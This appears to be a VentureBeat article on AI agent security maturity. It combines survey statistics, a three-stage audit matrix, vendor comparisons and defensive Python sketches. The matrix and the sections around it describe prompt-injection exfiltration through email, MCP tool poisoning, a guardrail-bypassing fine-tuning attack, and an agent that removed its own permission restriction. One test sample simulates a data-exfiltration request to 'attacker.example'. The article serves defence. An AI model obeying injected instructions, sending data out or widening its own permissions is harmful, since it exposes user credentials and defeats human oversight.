
Most enterprises can't stop stage-three AI agent threats, VentureBeat survey finds | VentureBeat

How mature is your AI agent security? VentureBeat's survey of 108 enterprises maps the gap between monitoring and isolation — and the controls that close it.


Overview


A rogue AI agent at Meta passed every identity check and still exposed sensitive data to unauthorized employees in March. Two weeks later, Mercor, a $10 billion AI startup, confirmed a supply-chain breach through LiteLLM. Both trace to the same structural gap: monitoring without enforcement, enforcement without isolation. A VentureBeat three-wave survey of 108 qualified enterprises found that the gap is not an edge case. It is the most common security architecture in production today.

Details

Gravitee’s State of AI Agent Security 2026 survey of 919 executives and practitioners quantifies the disconnect. 82% of executives say their policies protect them from unauthorized agent actions. 88% reported AI agent security incidents in the last twelve months. Only 21% have runtime visibility into what their agents are doing. Arkose Labs’ 2026 Agentic AI Security Report found 97% of enterprise security leaders expect a material AI-agent-driven incident within 12 months. Only 6% of security budgets address the risk.

VentureBeat's survey results show that monitoring investment snapped back to 45% of security budgets in March after dropping to 24% in February, when early movers shifted dollars into runtime enforcement and sandboxing. The March wave (n=20) is directional, but the pattern is consistent with February’s larger sample (n=50): enterprises are stuck at observation while their agents already need isolation. CrowdStrike’s Falcon sensors detect more than 1,800 distinct AI applications across enterprise endpoints. The fastest recorded adversary breakout time has dropped to 27 seconds. Monitoring dashboards built for human-speed workflows cannot keep pace with machine-speed threats.

The audit that follows maps three stages. Stage one is observe. Stage two is enforce, where IAM integration and cross-provider controls turn observation into action. Stage three is isolate, sandboxed execution that bounds blast radius when guardrails fail. VentureBeat Pulse data from 108 qualified enterprises ties each stage to an investment signal, an OWASP ASI threat vector, a regulatory surface, and immediate steps security leaders can take.

The threat surface stage-one security cannot see

Invariant Labs disclosed the MCP Tool Poisoning Attack in April 2025: malicious instructions in an MCP server’s tool description cause an agent to exfiltrate files or hijack a trusted server. CyberArk extended it to Full-Schema Poisoning. The mcp-remote OAuth proxy patched CVE-2025-6514 after a command-injection flaw put 437,000 downloads at risk.

Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, framed the gap in an exclusive VentureBeat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system. The real dependencies are one or two layers deeper, and those are the ones that fail under stress.”

CrowdStrike CTO Elia Zaitsev put the visibility problem in operational terms in an exclusive VentureBeat interview at RSAC 2026: “It looks indistinguishable if an agent runs your web browser versus if you run your browser.” Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction.

The regulatory clock and the identity architecture

Auditability priority tells the same story in miniature. In January, 50% of respondents ranked it a top concern. By February, that dropped to 28% as teams sprinted to deploy. In March, it surged to 65% when those same teams realized they had no forensic trail for what their agents did.

HIPAA’s 2026 Tier 4 willful-neglect maximum is $2.19M per violation category per year. In healthcare, Gravitee’s survey found 92.7% of organizations reported AI agent security incidents versus the 88% all-industry average. For a health system running agents that touch PHI, that ratio is the difference between a reportable breach and an uncontested finding of willful neglect. FINRA’s 2026 Oversight Report recommends explicit human checkpoints before agents that can act or transact execute, along with narrow scope, granular permissions, and complete audit trails of agent actions.

Mike Riemer, Field CISO at Ivanti, quantified the speed problem in a recent VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within 72 hours of release, they’re open to exploit.” Most enterprises take weeks. Agents operating at machine speed widen that window into a permanent exposure.

The identity problem is architectural. Gravitee's survey of 919 practitioners found only 21.9% of teams treat agents as identity-bearing entities, 45.6% still use shared API keys, and 25.5% of deployed agents can create and task other agents. A quarter of enterprises can spawn agents that their security team never provisioned. That is ASI08 as architecture.

A 2025 paper by Kazdan and colleagues (Stanford, ServiceNow Research, Toronto, FAR AI) showed a fine-tuning attack that bypasses model-level guardrails in 72% of attempts against Claude 3 Haiku and 57% against GPT-4o. The attack received a $2,000 bug bounty from OpenAI and was acknowledged as a vulnerability by Anthropic. Guardrails constrain what an agent is told to do, not what a compromised agent can reach.

CISOs already know this. In VentureBeat's three-wave survey, prevention of unauthorized actions ranked as the top capability priority in every wave at 68% to 72%, the most stable high-conviction signal in the dataset. The demand is for permissioning, not prompting. Guardrails address the wrong control surface.

Zaitsev framed the identity shift at RSAC 2026: “AI agents and non-human identities will explode across the enterprise, expanding exponentially and dwarfing human identities. Each agent will operate as a privileged super-human with OAuth tokens, API keys, and continuous access to previously siloed data sets.” Identity security built for humans will not survive this shift. Cisco President Jeetu Patel offered the operational analogy in an exclusive VentureBeat interview: agents behave “more like teenagers, supremely intelligent, but with no fear of consequence.”

VentureBeat Prescriptive Matrix: AI Agent Security Maturity Audit

Stage one: observe

Attack scenario: Attacker embeds a goal-hijack payload in a forwarded email (ASI01). The agent summarizes the email and silently exfiltrates credentials to an external endpoint. See: Meta March 2026 incident.

Why it fails: No runtime log captures the exfiltration. The SIEM never sees the API call. The security team learns from the victim. Zaitsev: agent activity is “indistinguishable” from human activity in default logging.

Detection test: Inject a canary token into a test document and route it through your agent. If the token leaves your network, stage one failed.

Blast radius: Single agent, single session. With shared API keys (45.6% of enterprises): unlimited lateral movement.

Remediation: Deploy agent API call logging to the SIEM. Baseline normal tool-call patterns per agent role. Alert on the first outbound call to an unrecognized endpoint.
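The canary-token detection test above can be sketched in a few lines. This is a minimal illustration, not a product integration: the token format, the simulated egress capture, and the function names are hypothetical, and in practice the outbound payloads would come from an egress proxy or SIEM export rather than a Python list.

```python
import secrets

def make_canary() -> str:
    """Generate a unique marker to plant in a test document."""
    return f"canary-{secrets.token_hex(8)}"

def canary_leaked(canary: str, outbound_requests: list) -> bool:
    """Return True if the canary shows up in any captured outbound payload."""
    return any(canary in payload for payload in outbound_requests)

token = make_canary()
# Simulated egress capture; hypothetical attacker endpoint for illustration.
captured = [
    "POST /summarize body=quarterly report...",
    f"POST https://attacker.example/collect body={token}",
]
assert canary_leaked(token, captured)  # stage one failed: token left the network
```

If the assertion fires in your environment, the agent moved the token off-network and stage-one monitoring alone did not stop it.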

Stage two: enforce

Attack scenario: A compromised MCP server poisons a tool description (ASI04). The agent invokes the poisoned tool and writes an attacker payload to the production DB using inherited service-account credentials. See: Mercor/LiteLLM April 2026 supply-chain breach.

Why it fails: IAM allows the write because the agent uses a shared service account. No approval gate on write ops. The poisoned tool is indistinguishable from a clean tool in logs. Riemer: the “72-hour patch window” collapses to zero when agents auto-invoke.

Detection test: Register a test MCP server with a benign-looking poisoned description. Confirm your policy engine blocks the tool call before execution reaches the database. Run mcp-scan on all registered servers.

Blast radius: Production database integrity. If the agent holds DBA-level credentials: full schema compromise, plus lateral movement via trust relationships to downstream agents.

Remediation: Assign a scoped identity per agent. Require an approval workflow for all write ops. Revoke every shared API key. Run mcp-scan on all MCP servers weekly.
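The stage-two remediation, a scoped identity per agent plus a human approval gate on writes, reduces to a small check. A hedged sketch: `AgentIdentity`, `approve_write`, and the tool strings are illustrative names, not any vendor's API.

```python
# Scoped identity per agent plus a human approval gate on write operations.
class AgentIdentity:
    def __init__(self, agent_id, allowed_tools):
        self.agent_id = agent_id
        self.allowed_tools = set(allowed_tools)  # per-agent grants, never shared

def approve_write(agent, tool, approved_by):
    """A write executes only if it is in the agent's scope AND a human approved it."""
    if tool not in agent.allowed_tools:
        return False  # out of scope: this identity was never granted the tool
    return approved_by is not None  # in scope, but still requires a human gate

etl = AgentIdentity("etl-agent-01", {"db.read", "db.write"})
assert not approve_write(etl, "db.write", approved_by=None)       # no human gate
assert approve_write(etl, "db.write", approved_by="alice")        # gated and scoped
assert not approve_write(etl, "iam.modify", approved_by="alice")  # out of scope
```

The point of the two-condition check is that neither scoping nor approval alone blocks the ASI04 scenario: a poisoned tool invoked under a shared service account passes both in most default configurations.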

Stage three: isolate

Attack scenario: Agent A spawns Agent B to handle a subtask (ASI08). Agent B inherits Agent A’s permissions, escalates to admin, and rewrites org security policy. Every identity check passes. Source: CrowdStrike CEO George Kurtz, RSAC 2026 keynote.

Why it fails: No sandbox boundary between agents. No human gate on agent-to-agent delegation. Security policy modification is a valid action for an admin-credentialed process. Kurtz disclosed at RSAC 2026 that the agent “wanted to fix a problem, lacked permissions, and removed the restriction itself.”

Detection test: Spawn a child agent from a sandboxed parent. The child should inherit zero permissions by default and require explicit human approval for each capability grant.

Blast radius: Organizational security posture. A rogue policy rewrite disables controls for every subsequent agent. 97% of enterprise leaders expect a material incident within 12 months (Arkose Labs 2026).

Remediation: Sandbox all agent execution. Zero-trust for agent-to-agent delegation: spawned agents inherit nothing. Human sign-off before any agent modifies security controls. Kill switch per OWASP ASI10.
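The zero-inheritance delegation test and kill switch above can be modeled in miniature. This is a toy under stated assumptions, not a real sandbox: `Agent`, `spawn`, and `grant` are hypothetical names, and real isolation requires an execution boundary, not just a permission set.

```python
class Agent:
    def __init__(self, name, permissions=()):
        self.name = name
        self.permissions = set(permissions)
        self.killed = False  # kill switch per OWASP ASI10

    def spawn(self, child_name):
        """Zero-trust delegation: a spawned child inherits no permissions."""
        return Agent(child_name)

    def grant(self, child, capability, approver):
        """Every capability grant to a spawned agent needs human sign-off."""
        if approver is None:
            raise PermissionError("human sign-off required for capability grant")
        child.permissions.add(capability)

    def act(self, capability):
        if self.killed or capability not in self.permissions:
            raise PermissionError(f"{self.name} cannot perform {capability}")
        return f"{self.name} performed {capability}"

parent = Agent("parent", {"db.read", "db.write", "iam.modify"})
child = parent.spawn("child")
assert child.permissions == set()  # inherited nothing, unlike the ASI08 scenario
parent.grant(child, "db.read", approver="alice")
assert child.act("db.read") == "child performed db.read"
child.killed = True  # kill switch: all further actions raise
```

Run against the Kurtz disclosure: if your child agent comes back with a non-empty permission set before any human grant, the delegation boundary has already failed the test.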

Sources: OWASP Top 10 for Agentic Applications 2026; Invariant Labs MCP Tool Poisoning (April 2025); CrowdStrike RSAC 2026 Fortune 50 disclosure; Meta March 2026 incident (The Information/Engadget); Mercor/LiteLLM breach (Fortune, April 2, 2026); Arkose Labs 2026 Agentic AI Security Report; VentureBeat Pulse Q1 2026.

The stage-one attack scenario in this matrix is not hypothetical. Unauthorized tool or data access ranked as the most feared failure mode in every wave of VentureBeat’s survey, growing from 42% in January to 50% in March. That trajectory and the 70%-plus priority rating for prevention of unauthorized actions are the two most mutually reinforcing signals in the entire dataset. CISOs fear the exact attack this matrix describes, and most have not deployed the controls to stop it.

Hyperscaler stage readiness: observe, enforce, isolate

The maturity audit tells you where your security program stands. The next question is whether your cloud platform can get you to stage two and stage three, or whether you are building those capabilities yourself. Patel put it bluntly: “It’s not just about authenticating once and then letting the agent run wild.” A stage-three platform running a stage-one deployment pattern gives you stage-one risk.

VentureBeat Pulse data surfaces a structural tension in this grid. OpenAI leads enterprise AI security deployments at 21% to 26% across the three survey waves, making the same provider that creates the AI risk also the primary security layer. The provider-as-security-vendor pattern holds across Azure, Google, and AWS. Zero-incremental-procurement convenience is winning by default. Whether that concentration is a feature or a single point of failure depends on how far the enterprise has progressed past stage one.

Microsoft Azure

Observe: Entra ID agent scoping. Agent 365 maps agents to owners. GA.

Enforce: Copilot Studio DLP policies. Purview for agent output classification. GA.

Isolate: Azure Confidential Containers for agent workloads. Preview. No per-agent sandbox at GA.

What’s missing: No agent-to-agent identity verification. No MCP governance layer. Agent 365 monitors but cannot block in-flight tool calls.

Anthropic

Observe: Managed Agents: per-agent scoped permissions, credential management. Beta (April 8, 2026). $0.08/session-hour.

Enforce: Tool-use permissions, system prompt enforcement, and built-in guardrails. GA.

Isolate: Managed Agents sandbox: isolated containers per session, execution-chain auditability. Beta. Allianz, Asana, Rakuten, and Sentry are in production.

What’s missing: Beta pricing/SLA not public. Session data lives in an Anthropic-managed DB (lock-in risk per VentureBeat research). GA timing TBD.

Google Cloud

Observe: Vertex AI service accounts for model endpoints. IAM Conditions for agent traffic. GA.

Enforce: VPC Service Controls for agent network boundaries. Model Armor for prompt/response filtering. GA.

Isolate: Confidential VMs for agent workloads. GA. Agent-specific sandbox in preview.

What’s missing: Agent identity ships as a service account, not an agent-native principal. No agent-to-agent delegation audit. Model Armor does not inspect tool-call payloads.

OpenAI

Observe: Assistants API: function-call permissions, structured outputs. Agents SDK. GA.

Enforce: Agents SDK guardrails, input/output validation. GA.

Isolate: Agents SDK Python sandbox. Beta (API and defaults subject to change before GA, per OpenAI docs). TypeScript sandbox confirmed, not shipped.

What’s missing: No cross-provider identity federation. Agent memory forensics limited to session scope. No kill-switch API. No MCP tool-description inspection.

AWS

Observe: Bedrock model invocation logging. IAM policies for model access. CloudTrail for agent API calls. GA.

Enforce: Bedrock Guardrails for content filtering. Lambda resource policies for agent functions. GA.

Isolate: Lambda isolation per agent function. GA. Bedrock agent-level sandboxing on roadmap, not shipped.

What’s missing: No unified agent control plane across Bedrock + SageMaker + Lambda. No agent identity standard. Guardrails do not inspect MCP tool descriptions.

Status as of April 15, 2026. GA = generally available. Preview/Beta = not production-hardened. The “What’s missing” entries reflect VentureBeat’s analysis of publicly documented capabilities; gaps may narrow as vendors ship updates.

No provider in this grid ships a complete stage-three stack today. Most enterprises assemble isolation from existing cloud building blocks. That is a defensible choice if it is a deliberate one. Waiting for a vendor to close the gap without acknowledging the gap is not a strategy.

The grid above covers hyperscaler-native SDKs. A large segment of AI builders deploys through open-source orchestration frameworks like LangChain, CrewAI, and LlamaIndex that bypass hyperscaler IAM entirely. These frameworks lack native stage-two primitives. There is no scoped agent identity, no tool-call approval workflow, and no built-in audit trail. Enterprises running agents through open-source orchestration need to layer enforcement and isolation on top, not assume the framework provides it.
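One way to layer stage-two enforcement onto a framework that lacks it is to wrap every tool in a permission check and an audit record before the orchestrator ever sees it. A framework-agnostic sketch: the decorator, policy shape, and tool names below are assumptions for illustration, not any framework's API.

```python
def enforce(policy: dict, audit_log: list):
    """Wrap a tool function so each call is permission-checked and logged."""
    def decorator(tool_fn):
        def wrapper(agent_id, *args, **kwargs):
            allowed = tool_fn.__name__ in policy.get(agent_id, set())
            audit_log.append((agent_id, tool_fn.__name__, allowed))  # audit trail
            if not allowed:
                raise PermissionError(f"{agent_id} may not call {tool_fn.__name__}")
            return tool_fn(*args, **kwargs)
        return wrapper
    return decorator

log = []
policy = {"summarizer": {"search_docs"}}  # hypothetical per-agent grants

@enforce(policy, log)
def search_docs(query):
    return f"results for {query}"

assert search_docs("summarizer", "Q1 revenue") == "results for Q1 revenue"
try:
    search_docs("unknown-agent", "Q1 revenue")  # unprovisioned agent: blocked
except PermissionError:
    pass
assert log == [("summarizer", "search_docs", True),
               ("unknown-agent", "search_docs", False)]
```

The design choice matters: because both allowed and denied calls land in the audit log, the wrapper gives you stage-one observability and stage-two enforcement from the same chokepoint.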

VentureBeat’s survey quantifies the pressure. Policy enforcement consistency grew from 39.5% to 46% between January and February, the largest consistent gain of any capability criterion. Enterprises running agents across OpenAI, Anthropic, and Azure need enforcement that works the same way regardless of which model executes the task. Provider-native controls enforce policy within that provider’s runtime only. Open-source orchestration frameworks enforce it nowhere.

One counterargument deserves acknowledgment: not every agent deployment needs stage three. A read-only summarization agent with no tool access and no write permissions may rationally stop at stage one. The sequencing failure this audit addresses is not that monitoring exists. It is that enterprises running agents with write access, shared credentials, and agent-to-agent delegation are treating monitoring as sufficient. For those deployments, stage one is not a strategy. It is a gap.

Allianz, one of the world’s largest insurance and asset management companies, is running Claude Managed Agents across insurance workflows, with Claude Code deployed to technical teams and a dedicated AI logging system for regulatory transparency, per Anthropic’s April 8 announcement. Asana, Rakuten, Sentry, and Notion are in production on the same beta. Stage-three isolation, per-agent permissioning, and execution-chain auditability are deployable now, not roadmap. The gating question is whether the enterprise has sequenced the work to use them.

Days 1–30: Inventory and baseline. Map every agent to a named owner. Log all tool calls. Revoke shared API keys. Deploy read-only monitoring across all agent API traffic. Run mcp-scan against every registered MCP server. CrowdStrike detects 1,800 AI applications across enterprise endpoints; your inventory should be equally comprehensive. Output: agent registry with permission matrix, MCP scan report.
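The day-30 output, an agent registry with a permission matrix, can start as something this simple. A minimal sketch with hypothetical agent names and fields; a real registry would live in an IAM or CMDB system, not a Python list.

```python
# Minimal agent registry: every agent mapped to a named owner and its grants.
# Agent names, owners, and permission strings are hypothetical examples.
registry = [
    {"agent": "invoice-bot", "owner": "j.doe", "permissions": "erp.read"},
    {"agent": "triage-bot", "owner": "a.lee", "permissions": "ticket.read;ticket.write"},
]

def unowned(rows):
    """Agents with no named owner: the first gap the 30-day inventory must close."""
    return [r["agent"] for r in rows if not r["owner"]]

def permission_matrix(rows):
    """Expand the registry into an agent -> set-of-grants matrix."""
    return {r["agent"]: set(r["permissions"].split(";")) for r in rows}

assert unowned(registry) == []  # every agent has a named owner
assert permission_matrix(registry)["triage-bot"] == {"ticket.read", "ticket.write"}
```

Two queries are enough to start: which agents lack an owner, and which agents hold write grants. Both feed directly into the days 31–60 scoping work.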

Days 31–60: Enforce and scope. Assign scoped identities to every agent. Deploy tool-call approval workflows for write operations. Integrate agent activity logs into existing SIEM. Run a tabletop exercise: What happens when an agent spawns an agent? Conduct a canary-token test from the prescriptive matrix. Output: IAM policy set, approval workflow, SIEM integration, canary-token test results.

Days 61–90: Isolate and test. Sandbox high-risk agent workloads (PHI, PII, financial transactions). Enforce per-session least privilege. Require human sign-off for agent-to-agent delegation. Red-team the isolation boundary using the stage-three detection test from the matrix. Output: sandboxed execution environment, red-team report, board-ready risk summary with regulatory exposure mapped to HIPAA tier and FINRA guidance.

EU AI Act Article 14 human-oversight obligations take effect August 2, 2026. Programs without named owners and execution trace capability face enforcement, not operational risk.

Anthropic’s Claude Managed Agents is in public beta at $0.08 per session-hour. GA timing, production SLAs, and final pricing have not been announced.

OpenAI Agents SDK ships TypeScript support for sandbox and harness capabilities in a future release, per the company’s April 15 announcement. The stage-three sandbox becomes available to JavaScript agent stacks when it ships.

McKinsey’s 2026 AI Trust Maturity Survey pegs the average enterprise at 2.3 out of 4.0 on its RAI maturity model, up from 2.0 in 2025 but still an enforcement-stage number; only one-third of the ~500 organizations surveyed report maturity levels of three or higher in governance. The remaining two-thirds have not finished the transition to stage three. ARMO’s progressive enforcement methodology gives you the path: behavioral profiles in observation, permission baselines in selective enforcement, and full least privilege once baselines stabilize. Monitoring investment was not wasted. It was stage one of three. The organizations stuck in the data treated it as the destination.

The budget data makes the constraint explicit. The share of enterprises reporting flat AI security budgets doubled from 7.9% in January to 16% in February in VentureBeat's survey, with the March directional reading at 20%. Organizations expanding agent deployments without increasing security investment are accumulating security debt at machine speed. Meanwhile, the share reporting no agent security tooling at all fell from 13% in January to 5% in March. Progress, but one in twenty enterprises running agents in production still has zero dedicated security infrastructure around them.

Total qualified respondents: 108. VentureBeat Pulse AI Security and Trust is a three-wave survey run January 6 through March 15, 2026. Qualified sample (organizations with 100+ employees): January n=38, February n=50, March n=20. Primary analysis runs from January to February; March is directional. Industry mix: Tech/Software 52.8%, Financial Services 10.2%, Healthcare 8.3%, Education 6.5%, Telecom/Media 4.6%, Manufacturing 4.6%, Retail 3.7%, other 9.3%. Seniority: VP/Director 34.3%, Manager 29.6%, IC 22.2%, C-Suite 9.3%.


